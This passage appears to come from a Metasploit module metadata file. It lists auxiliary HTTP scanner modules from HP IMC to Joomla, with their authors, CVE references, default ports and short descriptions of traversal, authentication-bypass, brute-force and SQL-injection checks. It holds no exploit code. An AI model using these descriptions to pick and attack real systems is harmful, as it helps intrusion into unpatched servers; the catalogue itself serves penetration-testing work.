"full_name": "auxiliary/scanner/http/hp_imc_reportimgservlt_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and a directory traversal in HP\n Intelligent Management, specifically in the ReportImgServlt, in order to retrieve\n arbitrary files with SYSTEM privileges. This module has been tested successfully on\n HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.",
"references": [
"CVE-2012-5203",
"OSVDB-91028",
"BID-58672",
"ZDI-13-052"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_imc_som_file_download": {
"name": "HP Intelligent Management SOM FileDownloadServlet Arbitrary Download",
"full_name": "auxiliary/scanner/http/hp_imc_som_file_download",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the FileDownloadServlet from the SOM component, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully\n on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.",
"references": [
"CVE-2013-4826",
"OSVDB-98251",
"BID-62898",
"ZDI-13-242"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_imc_som_file_download",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_getfileinternal_fileaccess": {
"name": "HP SiteScope SOAP Call getFileInternal Remote File Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope to\n retrieve an arbitrary file from the remote server. It is accomplished by calling\n the getFileInternal operation available through the APISiteScopeImpl AXIS service.\n This module has been successfully tested on HP SiteScope 11.20 over Windows 2003\n SP2 and Linux Centos 6.3.",
"references": [
"OSVDB-85119",
"BID-55269",
"ZDI-12-176"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_getsitescopeconfiguration": {
"name": "HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope\n which allows to retrieve the HP SiteScope configuration, including administrative\n credentials. It is accomplished by calling the getSiteScopeConfiguration operation\n available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration\n is retrieved as file containing Java serialization data. This module has been\n tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos\n 6.3.",
"references": [
"OSVDB-85120",
"BID-55269",
"ZDI-12-173"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sitescope_loadfilecontent_fileaccess": {
"name": "HP SiteScope SOAP Call loadFileContent Remote File Access",
"full_name": "auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in HP SiteScope to\n retrieve an arbitrary text file from the remote server. It is accomplished by\n calling the loadFileContent operation available through the APIMonitorImpl AXIS\n service. This module has been successfully tested on HP SiteScope 11.20 over\n Windows 2003 SP2 and Linux Centos 6.3.",
"references": [
"OSVDB-85118",
"BID-55269",
"ZDI-12-177"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/hp_sys_mgmt_login": {
"name": "HP System Management Homepage Login Utility",
"full_name": "auxiliary/scanner/http/hp_sys_mgmt_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to login to HP System Management Homepage using host\n operating system authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 2381,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-04 13:37:11 +0000",
"path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/hp_sys_mgmt_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_header": {
"name": "HTTP Header Detection",
"full_name": "auxiliary/scanner/http/http_header",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>",
"rick2600"
],
"description": "This module shows HTTP Headers returned by the scanned systems.",
"references": [
"URL-http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html",
"URL-http://en.wikipedia.org/wiki/List_of_HTTP_header_fields"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_header.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_header",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_hsts": {
"name": "HTTP Strict Transport Security (HSTS) Detection",
"full_name": "auxiliary/scanner/http/http_hsts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "Display HTTP Strict Transport Security (HSTS) information about each system.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_hsts.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_hsts",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_login": {
"name": "HTTP Login Utility",
"full_name": "auxiliary/scanner/http/http_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to authenticate to an HTTP service.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081,
8444
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_put": {
"name": "HTTP Writable Path PUT/DELETE File Access",
"full_name": "auxiliary/scanner/http/http_put",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kashif <Kashif@compulife.com.pk>",
"CG <cg@carnal0wnage.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module can abuse misconfigured web servers to upload and delete web content\n via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.\n\n PUT is the default. If filename isn't specified, the module will generate a\n random string for you as a .txt file. If DELETE is used, a filename is required.",
"references": [
"OSVDB-397"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_put.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_put",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_sickrage_password_leak": {
"name": "HTTP SickRage Password Leak",
"full_name": "auxiliary/scanner/http/http_sickrage_password_leak",
"rank": 300,
"disclosure_date": "2018-03-08",
"type": "auxiliary",
"author": [
"Sven Fassbender",
"Shelby Pace"
],
"description": "SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP\n responses unless the user has set login information for SickRage.\n\n By default, SickRage does not require login information for the installation.",
"references": [
"CVE-2018-9160",
"EDB-44545"
],
"platform": "",
"arch": "",
"rport": 8081,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-25 17:24:13 +0000",
"path": "/modules/auxiliary/scanner/http/http_sickrage_password_leak.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_sickrage_password_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_traversal": {
"name": "Generic HTTP Directory Traversal Utility",
"full_name": "auxiliary/scanner/http/http_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Ewerson Guimaraes(Crash) <crash@dclabs.com.br>",
"Michael Messner <devnull@s3cur1ty.de>",
"et <et@cyberspace.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to test if a web server (or web application) is\n vulnerable to directory traversal with four different actions.\n\n The 'CHECK' action (default) is used to automatically (or manually) find if\n directory traversal exists in the web server, and then return the path that\n triggers the vulnerability. The 'DOWNLOAD' action shares the same ability as\n 'CHECK', but will take advantage of the found trigger to download files based on\n a 'FILELIST' of your choosing. The 'PHPSOURCE' action can be used to download\n source against PHP applications. The 'WRITABLE' action can be used to determine\n if the trigger can be used to write files outside the www directory.\n\n To use the 'COOKIE' option, set your value like so: \"name=value\".",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/http_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/http_version": {
"name": "HTTP Version Detection",
"full_name": "auxiliary/scanner/http/http_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "Display version information about each system.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/http_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/http_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/httpbl_lookup": {
"name": "Http:BL Lookup",
"full_name": "auxiliary/scanner/http/httpbl_lookup",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module can be used to enumerate information\n about IP addresses from Project HoneyPot's HTTP Block List.",
"references": [
"URL-http://www.projecthoneypot.org/httpbl_api.php"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
"is_install_path": true,
"ref_name": "scanner/http/httpbl_lookup",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/httpdasm_directory_traversal": {
"name": "Httpdasm Directory Traversal",
"full_name": "auxiliary/scanner/http/httpdasm_directory_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"John Leitch",
"Shelby Pace"
],
"description": "This module allows for traversing the file system of a host running httpdasm v0.92.",
"references": [
"EDB-15861"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-19 14:55:53 +0000",
"path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/httpdasm_directory_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/iis_internal_ip": {
"name": "Microsoft IIS HTTP Internal IP Disclosure",
"full_name": "auxiliary/scanner/http/iis_internal_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heather Pilkington"
],
"description": "Collect any leaked internal IPs by requesting commonly redirected locations from IIS.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/iis_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/iis_shortname_scanner": {
"name": "Microsoft IIS shortname vulnerability scanner",
"full_name": "auxiliary/scanner/http/iis_shortname_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Soroush Dalili",
"Ali Abbasnejad",
"MinatoTW <shaks19jais@gmail.com>",
"egre55 <ianaustin@protonmail.com>"
],
"description": "The vulnerability is caused by a tilde character \"~\" in a GET or OPTIONS request, which\n could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili\n and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in\n 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.",
"references": [
"URL-https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability",
"URL-https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-22 09:01:11 +0000",
"path": "/modules/auxiliary/scanner/http/iis_shortname_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/iis_shortname_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/influxdb_enum": {
"name": "InfluxDB Enum Utility",
"full_name": "auxiliary/scanner/http/influxdb_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>",
"Nixawk"
],
"description": "This module enumerates databases on InfluxDB via the REST API, using the\n default credentials root:root.",
"references": [
"URL-https://docs.influxdata.com/influxdb/",
"URL-https://www.shodan.io/search?query=X-Influxdb-Version"
],
"platform": "",
"arch": "",
"rport": 8086,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-04-23 20:51:04 +0000",
"path": "/modules/auxiliary/scanner/http/influxdb_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/influxdb_enum",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/infovista_enum": {
"name": "InfoVista VistaPortal Application Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/infovista_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module attempts to scan for InfoVista VistaPortal Web Application, finds its\n version and performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/infovista_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/intel_amt_digest_bypass": {
"name": "Intel AMT Digest Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/http/intel_amt_digest_bypass",
"rank": 300,
"disclosure_date": "2017-05-05",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module scans for Intel Active Management Technology endpoints and attempts\n to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service\n can be found on ports 16992, 16993 (tls), 623, and 624 (tls).",
"references": [
"CVE-2017-5689",
"URL-https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability",
"URL-https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr"
],
"platform": "",
"arch": "",
"rport": 16992,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/intel_amt_digest_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ipboard_login": {
"name": "IP Board Login Auxiliary Module",
"full_name": "auxiliary/scanner/http/ipboard_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christopher Truncer chris <Christopher Truncer chris@christophertruncer.com>"
],
"description": "This module attempts to validate user provided credentials against\n an IP Board web application.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/ipboard_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jboss_status": {
"name": "JBoss Status Servlet Information Gathering",
"full_name": "auxiliary/scanner/http/jboss_status",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module queries the JBoss status servlet to collect sensitive\n information, including URL paths, GET parameters and client IP addresses.\n This module has been tested against JBoss 4.0, 4.2.2 and 4.2.3.",
"references": [
"CVE-2008-3273",
"URL-https://seclists.org/fulldisclosure/2011/Sep/139",
"URL-https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf",
"URL-http://www.slideshare.net/chrisgates/lares-fromlowtopwned"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/scanner/http/jboss_status.rb",
"is_install_path": true,
"ref_name": "scanner/http/jboss_status",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jboss_vulnscan": {
"name": "JBoss Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/jboss_vulnscan",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tyler Krpata",
"Zach Grace <@ztgrace>"
],
"description": "This module scans a JBoss instance for a few vulnerabilities.",
"references": [
"CVE-2010-0738",
"CVE-2017-12149"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-13 16:10:32 +0000",
"path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
"is_install_path": true,
"ref_name": "scanner/http/jboss_vulnscan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_command": {
"name": "Jenkins-CI Unauthenticated Script-Console Scanner",
"full_name": "auxiliary/scanner/http/jenkins_command",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"altonjx",
"Jeffrey Cap"
],
"description": "This module scans for unauthenticated Jenkins-CI script consoles and\n executes the specified command.",
"references": [
"CVE-2015-8103",
"URL-https://jenkins.io/security/advisory/2015-11-11/",
"URL-https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/",
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_enum": {
"name": "Jenkins-CI Enumeration",
"full_name": "auxiliary/scanner/http/jenkins_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jeff McCutchan"
],
"description": "This module enumerates a remote Jenkins-CI installation in an unauthenticated manner, including\n host operating system and Jenkins installation details.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:32:32 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/jenkins_login": {
"name": "Jenkins-CI Login Utility",
"full_name": "auxiliary/scanner/http/jenkins_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module attempts to login to a Jenkins-CI instance using a specific user/pass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/jenkins_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_bruteforce_login": {
"name": "Joomla Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/joomla_bruteforce_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"luisco100 <luisco100@gmail.com>"
],
"description": "This module attempts to authenticate to Joomla 2.5 or 3.0 through bruteforce attacks.",
"references": [
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_bruteforce_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_ecommercewd_sqli_scanner": {
"name": "Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner",
"rank": 300,
"disclosure_date": "2015-03-20",
"type": "auxiliary",
"author": [
"bperry"
],
"description": "This module will scan for hosts vulnerable to an unauthenticated SQL injection within the\n advanced search feature of the Web-Dorado ECommerce WD 1.2.5 and likely prior.",
"references": [
"CVE-2015-2562"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_gallerywd_sqli_scanner": {
"name": "Gallery WD for Joomla! Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/joomla_gallerywd_sqli_scanner",
"rank": 300,
"disclosure_date": "2015-03-30",
"type": "auxiliary",
"author": [
"CrashBandicoot",
"bperry"
],
"description": "This module will scan for Joomla! instances vulnerable to an unauthenticated SQL injection\n within the Gallery WD for Joomla! extension version 1.2.5 and likely prior.",
"references": [
"EDB-36563"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_pages": {
"name": "Joomla Page Scanner",
"full_name": "auxiliary/scanner/http/joomla_pages",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for common pages.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-31 11:37:10 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_pages",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_plugins": {
"name": "Joomla Plugins Scanner",
"full_name": "auxiliary/scanner/http/joomla_plugins",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for plugins and potential\n vulnerabilities.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
"is_install_path": true,
"ref_name": "scanner/http/joomla_plugins",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/joomla_version": {
"name": "Joomla Version Scanner",
"full_name": "auxiliary/scanner/http/joomla_version",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"newpid0"
],
"description": "This module scans a Joomla install for information about the underlying\n operating system and Joomla version.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/joomla_version.rb",
"is_install_path": true,
